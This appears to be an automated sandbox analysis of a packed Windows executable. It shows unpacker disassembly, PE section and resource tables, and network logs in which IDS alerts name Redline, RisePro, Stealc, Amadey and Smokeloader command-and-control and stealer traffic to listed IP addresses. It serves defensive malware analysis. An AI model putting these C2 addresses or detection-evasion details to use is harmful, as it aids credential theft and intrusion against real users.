inc esi
mov byte ptr [edi], al
dec eax
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jnc 00007F7F0C808C36h
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jnc 00007F7F0C808CB0h
xor eax, eax
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jnc 00007F7F0C808D58h
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
je 00007F7F0C808C5Bh
push edi
mov eax, eax
dec eax
sub edi, eax
mov al, byte ptr [edi]
pop edi
mov byte ptr [edi], al
dec eax
inc edi
mov ebx, 00000002h
jmp 00007F7F0C808BDAh
mov eax, 00000001h
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007F7F0C808C59h
mov dl, byte ptr [esi]
dec eax
inc esi
adc dl, dl
jc 00007F7F0C808C38h
sub eax, ebx
mov ebx, 00000001h
jne 00007F7F0C808C80h
mov ecx, 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x22b09e	0xf4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f6000	0x311d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x7e83ec	0xf1a4	.themida
IMAGE_DIRECTORY_ENTRY_SECURITY	0x335810	0x7d40	.themida
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa60000	0x10	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x22c018	0x28	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x18fa1e	0x8d600	193d135597f351c24636275e4b0ccee4	False	0.999704699933687	data	7.999596731666824	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x191000	0x4704e	0x18600	ca33f1c945e36148bb0ecb3d8d1a4d08	False	0.9994290865384615	data	7.997796743788793	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x1d9000	0xb198	0x1000	12e62a0f966ef97eddf12f678b78835a	False	0.95849609375	data	7.766300846582502	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x1e5000	0xf198	0x5800	65f8f80cbe10002f150dcc6a6e379a37	False	0.9905450994318182	data	7.976569896154681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x1f5000	0x1f4	0x200	998605d094eda1933ed7f7ee700802fc	False	0.72265625	data	6.089385527099146	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1f6000	0x311d0	0x31200	59ce5409380c2b1becc4866fa5bcae35	False	0.576564487913486	data	6.17240158147792	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x228000	0x21d0	0xc00	ce18bf34af7eedb49df99cab5dfc5285	False	0.8763020833333334	data	7.302976283594603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x22b000	0x1000	0x200	57fdc515f29b43e2f18e988d71df4164	False	0.369140625	data	2.808577221668524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x22c000	0x1000	0x200	6a7a0fe845d1ccd28f9b807be7c8cebe	False	0.0625	data	0.28456851570206254	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.themida	0x22d000	0x5dc000	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot	0x809000	0x256a00	0x256a00	a0972ec85777082bd7c48c15885e98e0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0xa60000	0x1000	0x10	ef25fd23aa268529def105d532ef094f	False	1.5	GLS_BINARY_LSB_FIRST	2.474601752714581	IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1f72a8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	German	Germany	0.38636363636363635
RT_CURSOR	0x1f73dc	0x134	data	German	Germany	0.4642857142857143
RT_CURSOR	0x1f7510	0x134	data	German	Germany	0.4805194805194805
RT_CURSOR	0x1f7644	0x134	data	German	Germany	0.38311688311688313
RT_CURSOR	0x1f7778	0x134	data	German	Germany	0.36038961038961037
RT_CURSOR	0x1f78ac	0x134	data	German	Germany	0.4090909090909091
RT_CURSOR	0x1f79e0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	German	Germany	0.4967532467532468
RT_BITMAP	0x1f7b14	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.43103448275862066
RT_BITMAP	0x1f7ce4	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	German	Germany	0.46487603305785125
RT_BITMAP	0x1f7ec8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.43103448275862066
RT_BITMAP	0x1f8098	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.39870689655172414
RT_BITMAP	0x1f8268	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.4245689655172414
RT_BITMAP	0x1f8438	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.5021551724137931
RT_BITMAP	0x1f8608	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.5064655172413793
RT_BITMAP	0x1f87d8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.39655172413793105
RT_BITMAP	0x1f89a8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.5344827586206896
RT_BITMAP	0x1f8b78	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	German	Germany	0.39655172413793105
RT_BITMAP	0x1f8d48	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	German	Germany	0.5208333333333334
RT_BITMAP	0x1f8e08	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	German	Germany	0.42857142857142855
RT_BITMAP	0x1f8ee8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	German	Germany	0.4955357142857143
RT_BITMAP	0x1f8fc8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	German	Germany	0.38392857142857145
RT_BITMAP	0x1f90a8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	German	Germany	0.4947916666666667
RT_BITMAP	0x1f9168	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	German	Germany	0.484375
RT_BITMAP	0x1f9228	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	German	Germany	0.42410714285714285
RT_BITMAP	0x1f9308	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	German	Germany	0.5104166666666666
RT_BITMAP	0x1f93c8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	German	Germany	0.5
RT_BITMAP	0x1f94a8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	German	Germany	0.4870689655172414
RT_BITMAP	0x1f9590	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	German	Germany	0.4895833333333333
RT_BITMAP	0x1f9650	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	German	Germany	0.3794642857142857
RT_ICON	0x1f9730	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	German	Germany	0.773936170212766
RT_ICON	0x1f9b98	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	German	Germany	0.5325726141078838
RT_ICON	0x1fc140	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	German	Germany	0.4291819472376671
RT_ICON	0x20c968	0xfe74	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	German	Germany	1.0003991403131716
RT_DIALOG	0x21c7dc	0x52	data	German	Germany	0.7682926829268293
RT_DIALOG	0x21c830	0x52	data	German	Germany	0.7560975609756098
RT_STRING	0x21c884	0xb8	data	German	Germany	0.5978260869565217
RT_STRING	0x21c93c	0x684	data	German	Germany	0.3237410071942446
RT_STRING	0x21cfc0	0x84c	data	German	Germany	0.3319209039548023
RT_STRING	0x21d80c	0x524	data	German	Germany	0.3882978723404255
RT_STRING	0x21dd30	0x950	data	German	Germany	0.3125
RT_STRING	0x21e680	0x8d8	data	German	Germany	0.32773851590106007
RT_STRING	0x21ef58	0x908	data	German	Germany	0.31358131487889274
RT_STRING	0x21f860	0x6a4	data	German	Germany	0.3035294117647059
RT_STRING	0x21ff04	0x580	data	German	Germany	0.3572443181818182
RT_STRING	0x220484	0x6bc	data	German	Germany	0.35556844547563804
RT_STRING	0x220b40	0x6f4	data	German	Germany	0.3292134831460674
RT_STRING	0x221234	0xa10	data	German	Germany	0.2760093167701863
RT_STRING	0x221c44	0x434	data	German	Germany	0.43215613382899626
RT_STRING	0x222078	0x2c8	data	German	Germany	0.45646067415730335
RT_STRING	0x222340	0x22c	data	German	Germany	0.46223021582733814
RT_STRING	0x22256c	0x114	data	German	Germany	0.6413043478260869
RT_STRING	0x222680	0x504	data	German	Germany	0.279595015576324
RT_STRING	0x222b84	0x304	data	German	Germany	0.3873056994818653
RT_STRING	0x222e88	0x178	data	German	Germany	0.523936170212766
RT_STRING	0x223000	0x1b0	data	German	Germany	0.43287037037037035
RT_STRING	0x2231b0	0x2bc	data	German	Germany	0.32
RT_STRING	0x22346c	0x340	data	German	Germany	0.4230769230769231
RT_STRING	0x2237ac	0x4b0	data	German	Germany	0.32416666666666666
RT_STRING	0x223c5c	0x3b4	Targa image data - Color 99 x 107 x 32 +68 +111 "z"	German	Germany	0.36603375527426163
RT_STRING	0x224010	0x1a4	data	German	Germany	0.5714285714285714
RT_STRING	0x2241b4	0xc8	data	German	Germany	0.685
RT_STRING	0x22427c	0xe8	data	German	Germany	0.646551724137931
RT_STRING	0x224364	0x4a0	data	German	Germany	0.38175675675675674
RT_STRING	0x224804	0x394	data	German	Germany	0.4039301310043668
RT_STRING	0x224b98	0x354	data	German	Germany	0.39906103286384975
RT_STRING	0x224eec	0x40c	data	German	Germany	0.3783783783783784
RT_STRING	0x2252f8	0x118	data	German	Germany	0.5214285714285715
RT_STRING	0x225410	0xcc	data	German	Germany	0.6029411764705882
RT_STRING	0x2254dc	0x208	data	German	Germany	0.5096153846153846
RT_STRING	0x2256e4	0x3cc	data	German	Germany	0.31378600823045266
RT_STRING	0x225ab0	0x354	data	German	Germany	0.4107981220657277
RT_STRING	0x225e04	0x2a4	data	German	Germany	0.4363905325443787
RT_RCDATA	0x2260a8	0x10	data	German	Germany	1.5
RT_RCDATA	0x2260b8	0x954	data	German	Germany	0.5879396984924623
RT_RCDATA	0x226a0c	0x301	Delphi compiled form 'TGDI_ErrorInfoForm'	German	Germany	0.5604681404421327
RT_GROUP_CURSOR	0x226d10	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.25
RT_GROUP_CURSOR	0x226d24	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.25
RT_GROUP_CURSOR	0x226d38	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.3
RT_GROUP_CURSOR	0x226d4c	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.3
RT_GROUP_CURSOR	0x226d60	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.3
RT_GROUP_CURSOR	0x226d74	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.3
RT_GROUP_CURSOR	0x226d88	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.3
RT_GROUP_ICON	0x226d9c	0x3e	data	German	Germany	0.8387096774193549
RT_MANIFEST	0x226ddc	0x3f4	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (952), with CRLF line terminators	English	United States	0.5138339920948617

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
USER32.dll	GetCursorPos
ADVAPI32.dll	RegCloseKey
SHELL32.dll	SHGetFolderPathA
ole32.dll	CoCreateInstance
OLEAUT32.dll	VariantClear

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
03/28/24-09:15:32.464510	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	29587	49819	5.42.65.0	192.168.2.4
03/28/24-09:15:30.376225	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49814	5.42.65.117	192.168.2.4
03/28/24-09:15:16.113613	TCP	2049837	ET TROJAN Suspected PrivateLoader Activity (POST)	49802	80	192.168.2.4	46.226.167.187
03/28/24-09:16:05.947955	TCP	2044696	ET TROJAN Win32/Amadey Host Fingerprint Exfil (POST) M2	49857	80	192.168.2.4	193.233.132.56
03/28/24-09:16:08.203210	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49862	80	192.168.2.4	37.255.238.137
03/28/24-09:15:21.115017	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49807	80	192.168.2.4	185.172.128.26
03/28/24-09:16:54.150552	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49814	50500	192.168.2.4	5.42.65.117
03/28/24-09:15:22.621973	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49807	80	192.168.2.4	185.172.128.26
03/28/24-09:15:23.082310	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49807	80	192.168.2.4	185.172.128.26
03/28/24-09:16:14.223978	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49874	80	192.168.2.4	37.255.238.137
03/28/24-09:16:12.080730	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49871	80	192.168.2.4	37.255.238.137
03/28/24-09:16:18.965436	TCP	2855239	ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST)	49876	80	192.168.2.4	193.233.132.56
03/28/24-09:15:30.747159	TCP	2049060	ET TROJAN RisePro TCP Heartbeat Packet	49814	50500	192.168.2.4	5.42.65.117
03/28/24-09:14:57.603552	TCP	2049837	ET TROJAN Suspected PrivateLoader Activity (POST)	49731	80	192.168.2.4	46.226.167.187
03/28/24-09:15:16.491301	TCP	2049837	ET TROJAN Suspected PrivateLoader Activity (POST)	49803	80	192.168.2.4	46.226.167.187
03/28/24-09:16:10.295496	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49866	80	192.168.2.4	37.255.238.137
03/28/24-09:16:13.374844	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49872	80	192.168.2.4	37.255.238.137
03/28/24-09:16:54.150745	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49817	50500	192.168.2.4	5.42.65.117
03/28/24-09:16:03.237197	TCP	2856122	ETPRO TROJAN Amadey CnC Response M1	80	49857	193.233.132.56	192.168.2.4
03/28/24-09:16:09.606194	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	58709	49863	193.233.132.74	192.168.2.4
03/28/24-09:16:10.097137	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	58709	49863	193.233.132.74	192.168.2.4
03/28/24-09:16:15.667120	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49875	80	192.168.2.4	37.255.238.137
03/28/24-09:16:02.779397	TCP	2856147	ETPRO TROJAN Amadey CnC Activity M3	49857	80	192.168.2.4	193.233.132.56
03/28/24-09:16:26.888601	TCP	2856151	ETPRO TROJAN Amadey CnC Activity M7	49882	80	192.168.2.4	193.233.132.56
03/28/24-09:16:34.871412	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	58709	49891	193.233.132.74	192.168.2.4
03/28/24-09:15:37.824656	TCP	2046056	ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)	29587	49819	5.42.65.0	192.168.2.4
03/28/24-09:15:59.410989	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	50500	49815	193.233.132.67	192.168.2.4
03/28/24-09:15:30.519895	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49815	193.233.132.67	192.168.2.4
03/28/24-09:16:25.168009	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	58709	49881	193.233.132.74	192.168.2.4
03/28/24-09:16:11.255490	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49870	80	192.168.2.4	37.255.238.137
03/28/24-09:15:50.277327	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49819	29587	192.168.2.4	5.42.65.0
03/28/24-09:16:09.470217	TCP	2039103	ET TROJAN Suspected Smokeloader Activity (POST)	49864	80	192.168.2.4	37.255.238.137
03/28/24-09:15:32.277815	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49819	29587	192.168.2.4	5.42.65.0
03/28/24-09:15:30.559873	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49817	5.42.65.117	192.168.2.4
03/28/24-09:16:06.487520	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49815	50500	192.168.2.4	193.233.132.67
03/28/24-09:16:02.154520	TCP	2046268	ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings)	49815	50500	192.168.2.4	193.233.132.67
03/28/24-09:16:16.081442	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49863	58709	192.168.2.4	193.233.132.74

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 28, 2024 09:14:53.112627983 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:53.299757004 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:53.299874067 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:53.316734076 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:53.504113913 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:53.558466911 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:53.627991915 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.628024101 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:53.628098011 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.630193949 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.630207062 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:53.835860968 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:53.835966110 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.839109898 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.839121103 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:53.839370012 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:53.886570930 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.907572031 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:53.952248096 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:54.099639893 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:54.099756002 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:54.099807978 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:54.101352930 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:54.101370096 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:54.101392031 CET	49732	443	192.168.2.4	104.26.9.59
Mar 28, 2024 09:14:54.101397991 CET	443	49732	104.26.9.59	192.168.2.4
Mar 28, 2024 09:14:54.200490952 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.200526953 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.200661898 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.201040030 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.201050043 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.474582911 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.474649906 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.477356911 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.477364063 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.477612972 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.478415966 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.524224997 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.753494978 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.753616095 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.753671885 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.753850937 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.753866911 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:54.753887892 CET	49733	443	192.168.2.4	34.117.186.192
Mar 28, 2024 09:14:54.753892899 CET	443	49733	34.117.186.192	192.168.2.4
Mar 28, 2024 09:14:56.965857983 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:56.967664957 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:57.154382944 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.316890955 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.370999098 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:57.603552103 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:57.603588104 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:57.790572882 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.989278078 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.989304066 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.989316940 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.989326000 CET	80	49731	46.226.167.187	192.168.2.4
Mar 28, 2024 09:14:57.989432096 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:57.989495039 CET	49731	80	192.168.2.4	46.226.167.187
Mar 28, 2024 09:14:58.176110029 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.176234007 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.186770916 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.190078974 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.190608025 CET	49738	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.190939903 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:58.272571087 CET	49740	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.272808075 CET	49741	80	192.168.2.4	93.186.225.194
Mar 28, 2024 09:14:58.274068117 CET	49742	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.286716938 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.290380955 CET	49744	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.294557095 CET	49745	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.298404932 CET	49746	80	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.369822979 CET	80	49742	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.370003939 CET	49742	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.370738029 CET	49742	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.373229027 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:58.373327971 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.373472929 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:58.380494118 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.380650997 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.380819082 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.380861998 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:58.380937099 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.380944967 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.380994081 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.381059885 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:58.381130934 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:58.384593010 CET	80	49744	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.384682894 CET	49744	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.384917021 CET	49744	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.388906002 CET	80	49745	172.67.180.119	192.168.2.4
Mar 28, 2024 09:14:58.389008999 CET	49745	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.389529943 CET	49745	80	192.168.2.4	172.67.180.119
Mar 28, 2024 09:14:58.392581940 CET	80	49746	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:58.392668962 CET	49746	80	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.392756939 CET	49746	80	192.168.2.4	104.21.42.248
Mar 28, 2024 09:14:58.402582884 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:58.402693033 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.403553963 CET	80	49738	176.113.115.135	192.168.2.4
Mar 28, 2024 09:14:58.403631926 CET	49738	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.404793024 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:58.404901981 CET	49738	80	192.168.2.4	176.113.115.135
Mar 28, 2024 09:14:58.465656042 CET	80	49742	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.465676069 CET	80	49742	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.465688944 CET	80	49742	18.205.93.0	192.168.2.4
Mar 28, 2024 09:14:58.465749025 CET	49742	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.469870090 CET	49742	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.472734928 CET	49747	80	192.168.2.4	18.205.93.0
Mar 28, 2024 09:14:58.475523949 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:58.479124069 CET	80	49744	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.479137897 CET	80	49744	104.21.36.53	192.168.2.4
Mar 28, 2024 09:14:58.479212999 CET	49744	80	192.168.2.4	104.21.36.53
Mar 28, 2024 09:14:58.480133057 CET	80	49744	104.21.36.53	192.168.2.4
